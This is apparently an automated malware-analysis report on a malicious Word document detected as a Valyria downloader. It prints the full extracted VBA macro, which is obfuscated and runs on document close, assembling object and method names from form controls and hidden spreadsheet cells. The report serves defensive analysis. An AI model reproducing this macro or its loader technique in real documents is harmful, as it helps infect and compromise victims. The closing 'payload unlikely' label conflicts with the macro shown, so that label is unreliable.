Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 201a94a1d74c9839…

MALICIOUS

Office (OOXML)

Size: 82.4 KB
Created: 2021-01-29 09:05:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-02-09
MD5: 3afd2771cc7fe087a243a06603cd99ba
SHA-1: 37206090abcab491dd76fa8d0fd7e500ad83f1af
SHA-256: 201a94a1d74c98399d8f896b10c1876ebef2394e4fcc4633f27eb7e1dfecf805
Risk score: 222

Heuristics (5)

  • ClamAV: Doc.Downloader.Valyria-10033915-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10033915-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set fnt = CreateObject(UserForm1.jlx & UserForm1.fa)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Set cu = CallByName(fnt.Workbooks, UserForm1.kr & UserForm1.ko, 1, UserForm2.ComboBox1, , , , UserForm1.wtj)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All extracted URLs were found in document text (OOXML body / shared strings); all are standard OOXML and Office extension XML namespace URIs, not network indicators:
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.microsoft.com/office/drawing/2016/ink
    • http://schemas.microsoft.com/office/drawing/2017/model3d
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2018/wordml/cex
    • http://schemas.microsoft.com/office/word/2016/wordml/cid
    • http://schemas.microsoft.com/office/word/2018/wordml
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 6947 bytes
SHA-256: f94de65f4f4dade478adec16af2db70f0b9b8560e7ca34bb6a2a32df555f352c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


' Module-level variables shared with the UserForm_Initialize handlers of UserForm3/4/5 below
Public eg, nz, ha, nn, jz, fnt, gi, b1, cn, ti, i6, p6, b9, c0, qr, js

' Entry point: fires when the document is closed
Sub Document_Close()
dk = UserForm2.ComboBox14
ra
End Sub

Sub ra()
On Error Resume Next
UserForm2.ComboBox1.ListIndex = 5
' ProgID is assembled from UserForm1 control values; the .Workbooks member used below
' suggests an Excel.Application instance
Set fnt = CreateObject(UserForm1.jlx & UserForm1.fa)
fnt.DisplayAlerts = False
gl = UserForm2.ComboBox14
ap = 1301
qo = 0
Err.Number = 0
' Up to two attempts (qo = 0, 16) to open a workbook via a method name built from form controls;
' the selected ComboBox1 item (index 5) is passed as the first argument
While ap <> 0 And qo < 32
Set cu = CallByName(fnt.Workbooks, UserForm1.kr & UserForm1.ko, 1, UserForm2.ComboBox1, , , , UserForm1.wtj)
ap = Err.Number
qo = qo + 16
Wend
lf = UserForm2.ComboBox3
' Failure path: re-run "ra" a few seconds later, either from a second object (kk, whose
' .Documents member suggests Word.Application) or from the current Application
If ap <> 0 Then
ErrHandler:
nxu = CallByName(Application, UserForm1.hf & UserForm1.fk, 2)
If nxu <> False Then
Set kk = CreateObject(UserForm1.xy & UserForm1.zpb)
ev = UserForm2.ComboBox6
CallByName kk.Documents, UserForm1.kr & UserForm1.ko, 1, ActiveDocument.FullName, , True
r8 = UserForm2.ComboBox18
x9 = UserForm2.ComboBox21
CallByName kk, UserForm1.gz & UserForm1.rc, 1, Now + TimeSerial(0, 0, 2), UserForm1.kq & UserForm1.sa & "ra"
Else
w = UserForm2.ComboBox5
CallByName Application, UserForm1.gz & UserForm1.rc, 1, Now + TimeSerial(0, 0, 17), UserForm1.kq & UserForm1.sa & "ra"
End If
fnt.Quit
y7x = UserForm2.ComboBox10
Exit Sub
End If
Dim o6
Set o6 = fnt.sheets(1)
kqo = "'"
cb7 = UserForm2.ComboBox28
js = fnt.sheets(5).Cells(1, 1)
If Len(js) < 1 Then
j7 = UserForm2.ComboBox3
If fnt.ActiveWorkbook.Title <> "Google" Then
GoTo ErrHandler
Else
Exit Sub
End If
End If
' Names and strings for the later stages are read from workbook cells rather than stored in the macro
f6 = o6.Cells(94, 28).Value
o9j = UserForm2.ComboBox22
nk = fnt.sheets(1).Cells(111, 27).Value
ti = fnt.sheets(1).Cells(122, 34).Value
i6 = fnt.sheets(2).Cells(21, 55).Value
jz = fnt.sheets(2).Cells(76, 31).Value
k = fnt.sheets(2).Cells(30, 59).Value
r5 = fnt.sheets(1).Cells(101, 9).Value
y1 = fnt.sheets(3).Cells(54, 34).Value
q0 = fnt.sheets(2).Cells(48, 13).Value
hq = o6.Cells(29, 52).Value
hd = UserForm2.ComboBox5
b9 = fnt.sheets(2).Cells(126, 10).Value
gi = fnt.sheets(1).Cells(109, 14).Value
cn = fnt.sheets(3).Cells(87, 42).Value
sj = fnt.sheets(3).Cells(4, 18).Value
cln = fnt.sheets(2).Cells(16, 49).Value
p6 = fnt.sheets(1).Cells(124, 10).Value
ss7 = UserForm2.ComboBox16
my = o6.Cells(94, 10).Value
c3 = fnt.sheets(2).Cells(70, 1).Value
eg = fnt.sheets(3).Cells(38, 13).Value
o1 = fnt.sheets(3).Cells(93, 33).Value
gm = o6.Cells(118, 55).Value
b1 = fnt.sheets(3).Cells(112, 29).Value
nz = fnt.sheets(3).Cells(136, 42).Value
u = fnt.sheets(3).Cells(87, 20).Value
rh = fnt.sheets(2).Cells(63, 33).Value
qr = ""
' Concatenate column A of sheet 4 into qr until the first empty cell
Set Sh1 = fnt.sheets(4)
hl = 1
go = True
While go
g5 = Sh1.Cells(hl, 1).Value
If Len(g5) < 1 Then
go = False
Else
qr = qr & g5
End If
hl = hl + 1
Wend
' Late-bound calls using the cell-sourced object and member names
lr = CallByName(fnt, hq, 2)
h9 = UserForm2.ComboBox10
UserForm1.na.Value = r5 & lr & c3
UserForm1.c.Value = nk
cw = UserForm2.ComboBox22
CallByName CreateObject(rh), gm, 1, UserForm1.na, my, UserForm1.c
m6 = UserForm2.ComboBox17
ao = UserForm2.ComboBox9
Set q3 = CreateObject(f6)
Set ld = CallByName(q3, k, 2)
Set eu = CallByName(ld, u, 1)
ly = UserForm2.ComboBox25
Set cn = CallByName(q3, cn, 2)
Set nn = q3
gc = UserForm2.ComboBox28
' The first reference to UserForm5/3/4 loads each form and fires its UserForm_Initialize
' handler (below), which continues the chain via the module-level variables
UserForm5.ComboBox1 = "ve"
Set eg = CallByName(c0, eg, 2)
b1 = CallByName(eg, b1, 2)
p3 = UserForm2.ComboBox16
UserForm1.qt.Value = o1 & y1
UserForm3.ComboBox1 = q0
UserForm1.qt.Value = sj
UserForm4.ComboBox1 = UserForm3.ComboBox1
q = UserForm2.ComboBox22
UserForm3.ComboBox1 = b1
' Assignments from undeclared (Empty) variables; any errors are swallowed by On Error Resume Next
q3 = odc
cu = xw
o6 = zo5
ld = d8m
eu = iq
cn = fp
ti = aw
i6 = a4
c0 = r2
eg = m5
nn = zm
DoEvents
CallByName fnt, cln, 1
fnt = kn
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{5F03CC38-4910-4B53-A27F-049BAAB0C91C}{D09A6E5E-D60F-4682-95A7-5A4CABE3107D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{916BFE95-7E79-46B2-AFC2-606047916C7B}{2853A585-1DC5-4863-B940-FB39525F60E3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 ' Build one string from every other control on this form (odd indices), then add it as
 ' ComboBox1 item 5, which is the item ra() selects with ListIndex = 5
 yq = UserForm2.Controls.Count - 1
 d4 = ""
 For t38 = 1 To yq Step 2
 d4 = d4 & UserForm2.Controls.Item(t38)
 Next
 ComboBox1.AddItem "f8"
 ComboBox1.AddItem "zg"
 ComboBox1.AddItem "ei"
 ComboBox1.AddItem "ed"
 ComboBox1.AddItem "i3"
 ComboBox1.AddItem d4
 ComboBox1.AddItem "gz"
 rg = UserForm2.ComboBox23
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{AC3927AA-67EE-4F75-8DD3-2C03E64F33B2}{1DA00FA7-CDD1-4E62-9621-DAA58A507419}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.eg, ActiveDocument.gi, VbMethod, 1, ActiveDocument.b1
 CallByName ActiveDocument.eg, ActiveDocument.nz, VbMethod, UserForm1.qt.Value
End Sub


Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{440EFA45-E9F5-40AB-8A8A-9F3A2E4C3350}{668F765A-8536-4AA1-80D0-FAB7838C85BF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.nn, ActiveDocument.jz, VbMethod, UserForm1.qt.Value, ActiveDocument.qr, ActiveDocument.js
End Sub


Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{42D99453-32D8-4923-BC10-E8AE8CF5BE09}{3774F433-FA61-4874-95FC-F573E5AC10AF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 Set ActiveDocument.ti = CallByName(ActiveDocument.cn, ActiveDocument.ti, VbGet)
 Set ActiveDocument.i6 = CallByName(ActiveDocument.ti, ActiveDocument.i6, VbGet)
 Set ActiveDocument.c0 = CallByName(ActiveDocument.i6, ActiveDocument.p6, VbMethod, ActiveDocument.b9)
End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 51200 bytes
SHA-256: b0e817c7a32b6159d4e10014c523ab86a57e9af1ca37f978daa87fd59e787287
Detection
ClamAV: Doc.Downloader.Valyria-10033915-0
Obfuscation or payload: unlikely